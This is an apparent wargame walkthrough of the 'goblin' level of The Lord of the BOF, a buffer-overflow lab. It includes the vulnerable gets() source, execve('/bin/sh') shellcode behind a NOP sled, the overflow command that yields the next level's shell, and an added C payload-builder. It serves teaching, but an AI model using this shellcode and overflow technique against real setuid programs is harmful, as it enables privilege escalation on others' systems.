http://www.hackerschool.org/HS_Boards/zboard.php?AllArticle=true&no=8605
Connecting to 192.168.0.22:23...
Connection established.
To escape to local shell, press 'Ctrl+Alt+]'.
[LOB login banner]
The Lord of the BOF : The Fellowship of the BOF, 2010
[enter to the dungeon]
gate : gate
[RULE]
- do not use local root exploit
- do not use LD_PRELOAD to my-pass
- do not use single boot [h4ck3rsch001]
login: cobolt
Password:
Last login: Tue Jul 1 13:02:01 from 192.168.0.20
[cobolt@localhost cobolt]$ bash2
[cobolt@localhost cobolt]$ ls -al
total 48
drwx------ 2 cobolt cobolt 4096 Jul 1 13:03 .
drwxr-xr-x 25 root root 4096 Mar 30 2010 ..
-rw------- 1 cobolt cobolt 3262 Jul 1 13:03 .bash_history
-rw-r--r-- 1 cobolt cobolt 24 Feb 26 2010 .bash_logout
-rw-r--r-- 1 cobolt cobolt 230 Feb 26 2010 .bash_profile
-rw-r--r-- 1 cobolt cobolt 124 Feb 26 2010 .bashrc
-rwxr-xr-x 1 cobolt cobolt 333 Feb 26 2010 .emacs
-rw-r--r-- 1 cobolt cobolt 3394 Feb 26 2010 .screenrc
-rwsr-sr-x 1 goblin goblin 11824 Feb 26 2010 goblin
-rw-r--r-- 1 root root 193 Mar 29 2010 goblin.c
[cobolt@localhost cobolt]$ cat goblin.c
/*
The Lord of the BOF : The Fellowship of the BOF
- goblin
- small buffer + stdin
*/
int main()
{
char buffer[16];
gets(buffer);
printf("%s\n", buffer);
}
===============================
Looking at the source, main() takes no arguments at all: there is no int argc and no char *argv[].
Input goes into the buffer variable through gets(), and as everyone knows gets() does no bounds
checking and stuffs in whatever it reads. So unlike the earlier levels nothing can be delivered
through argv: the overflow has to come in over stdin, and the shellcode has to live somewhere
else, here in an environment variable.
On Red Hat 6.2 the stack looks like this:

[ high address ] ← bottom of the stack (argv strings and the environment variables sit up here, which is why the SHELLCODE address comes out near 0xbfffffff)
---------------------
Return Address ← the value we have to overwrite
---------------------
Saved EBP (Base Pointer)
---------------------
buffer[16] ← the vulnerable buffer (lowest in the frame)
---------------------
[ low address ] ← top of the stack (ESP starts here)

No memory protection such as ASLR or a stack canary is applied, so addresses are stable between
runs and the return address can be overwritten freely.
char buffer is 16 bytes, and directly above it sits the saved frame pointer, which can be filled
with any characters at all.
\x90...
NOP sled (No Operation Sled)
\x90 is NOP, so it executes nothing.
So what if we fill exactly 20 bytes (16 of buffer + 4 of saved EBP) with \x90 and then write the
address we want over the return address? The 20 filler bytes are never executed; the sled that
actually matters is the run of \x90 placed in front of the shellcode in the environment variable,
which absorbs a small error in the guessed address.
If the return address points at that shellcode, that is the whole principle of popping a shell.
p.s. The 25-byte shellcode would not work no matter what I tried, so I put in a somewhat longer
shellcode and got a shell with the next level's privileges.
===============================
[cobolt@localhost cobolt]$ ./goblin
f
f
[cobolt@localhost cobolt]$ ./goblin
abcd
abcd
[cobolt@localhost cobolt]$ export SHELLCODE=$(python -c 'print "\x90"*200+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\xb0\x01\xcd\x80"')
[cobolt@localhost cobolt]$ vi ex_shell.c
[cobolt@localhost cobolt]$ cat ex_shell.c
#include <stdio.h>
#include <stdlib.h>   /* getenv() */
int main(void)
{
    /* print where the value of the SHELLCODE variable sits in this process's environment */
    printf("%p\n", getenv("SHELLCODE"));
    return 0;
}
[cobolt@localhost cobolt]$ gcc -o ex_shell ex_shell.c
[cobolt@localhost cobolt]$ ./ex_shell
0xbffffdfd
[cobolt@localhost cobolt]$ (python -c 'print "\x90"*20+"\xfd\xfd\xff\xbf"';cat) | ./goblin
my-pass
euid = 503
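Added example, not code from the post or from LOB: a small C tool that builds the stdin line used at the end of the session (16 filler bytes, 4 bytes over the saved EBP, then the return address little-endian) and corrects the address ex_shell printed for the difference in program-name length between ./ex_shell and ./goblin. The function names (adjust_env_addr, ret_is_safe_for_gets, lands_in_sled, build_payload) are ours. The two-bytes-per-character adjustment is the classic getenvaddr rule of thumb and is an assumption about the Linux/bash stack layout (the exec filename and bash's exported "_" variable both sit above the environment strings), not something the post measured; with a 200-byte sled a few bytes of error are harmless either way, which is why the unadjusted address in the post still worked.

```c
/* goblin_payload.c - added example for the goblin walkthrough.
 * Not part of the original post or of LOB; all function names are ours.
 *
 * Builds the line gets() in goblin reads:
 *   [16 bytes buffer][4 bytes saved EBP][4 bytes return address]
 * and corrects the SHELLCODE address printed by a helper such as ex_shell
 * for the program-name length of the real target.
 */
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define BUF_LEN 16      /* char buffer[16] in goblin.c */
#define SFP_LEN 4       /* saved EBP on 32-bit x86 */
#define NOP     0x90

/* Environment strings are copied to the very top of the stack, below the
 * exec filename and (when bash started the process) below the exported
 * "_=<program>" variable. Both contain the program name, so each byte of
 * name-length difference between helper and target moves the variable by
 * two bytes. Assumption: the classic getenvaddr rule of thumb; it relies
 * on bash, the Linux layout above and no ASLR (Red Hat 6.2 has none). */
unsigned int adjust_env_addr(unsigned int addr_in_helper,
                             const char *helper_name,
                             const char *target_name)
{
    long diff = (long)strlen(helper_name) - (long)strlen(target_name);
    return (unsigned int)((long)addr_in_helper + 2 * diff);
}

/* gets() stops at the first '\n' and drops it, so a return address that
 * contains a 0x0a byte can never be delivered intact. Returns 1 if usable. */
int ret_is_safe_for_gets(unsigned int ret)
{
    int i;
    for (i = 0; i < 4; i++)
        if (((ret >> (8 * i)) & 0xff) == '\n')
            return 0;
    return 1;
}

/* The sled starts at the address getenv() reported (first byte of the
 * variable's value) and is sled_len bytes long; any ret inside it slides
 * down into the shellcode. Returns 1 if ret lands inside the sled. */
int lands_in_sled(unsigned int sled_start, unsigned int sled_len, unsigned int ret)
{
    return ret >= sled_start && ret - sled_start < sled_len;
}

/* Write BUF_LEN + SFP_LEN filler bytes followed by ret in little-endian
 * order into out[]. The filler is 0x90 as in the post, but it is never
 * executed; it only has to reach the saved return address. Returns the
 * payload length (24 for goblin) or 0 if out[] is too small. */
size_t build_payload(unsigned char *out, size_t cap, unsigned int ret)
{
    size_t pad = BUF_LEN + SFP_LEN;
    size_t len = pad + 4;
    if (cap < len)
        return 0;
    memset(out, NOP, pad);
    out[pad + 0] = (unsigned char)(ret & 0xff);
    out[pad + 1] = (unsigned char)((ret >> 8) & 0xff);
    out[pad + 2] = (unsigned char)((ret >> 16) & 0xff);
    out[pad + 3] = (unsigned char)((ret >> 24) & 0xff);
    return len;
}

/* Usage on the LOB box, with SHELLCODE exported as in the post:
 *   (./goblin_payload 0xbffffdfd ./ex_shell ./goblin; cat) | ./goblin
 * The trailing newline terminates gets(); "cat" then keeps stdin open so
 * the spawned shell can read commands such as my-pass. */
int main(int argc, char **argv)
{
    unsigned int helper_addr, ret;
    unsigned char payload[BUF_LEN + SFP_LEN + 4];
    size_t n;

    if (argc != 4) {
        fprintf(stderr, "usage: %s <addr-from-helper> <helper-name> <target-name>\n",
                argv[0]);
        return 1;
    }
    helper_addr = (unsigned int)strtoul(argv[1], NULL, 0);
    ret = adjust_env_addr(helper_addr, argv[2], argv[3]);
    if (!ret_is_safe_for_gets(ret)) {
        fprintf(stderr, "0x%08x contains a newline byte; gets() would cut the line\n", ret);
        return 1;
    }
    n = build_payload(payload, sizeof payload, ret);
    fwrite(payload, 1, n, stdout);
    putchar('\n');
    return 0;
}
```

With the values from the session, adjust_env_addr(0xbffffdfd, "./ex_shell", "./goblin") gives 0xbffffe01, four bytes above what ex_shell printed, and both addresses fall inside the 200-byte sled exported in the post. The newline check matters more than it looks: a stack address such as 0xbfff0aff can never reach the return slot through gets(), and the only fix is to pick a different spot inside the sled.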
Date : 2025/07/02 05:00